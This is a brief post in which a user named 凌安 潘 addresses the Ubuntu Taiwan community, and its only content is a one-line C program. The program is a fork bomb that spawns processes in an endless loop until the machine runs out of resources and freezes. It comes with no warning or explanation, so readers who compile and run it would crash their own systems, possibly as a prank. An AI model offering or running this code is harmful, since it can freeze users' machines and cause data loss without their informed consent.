凌安 潘 says to Ubuntu 台灣社群
#include <unistd.h> int main() { while(1) fork(); return 0; }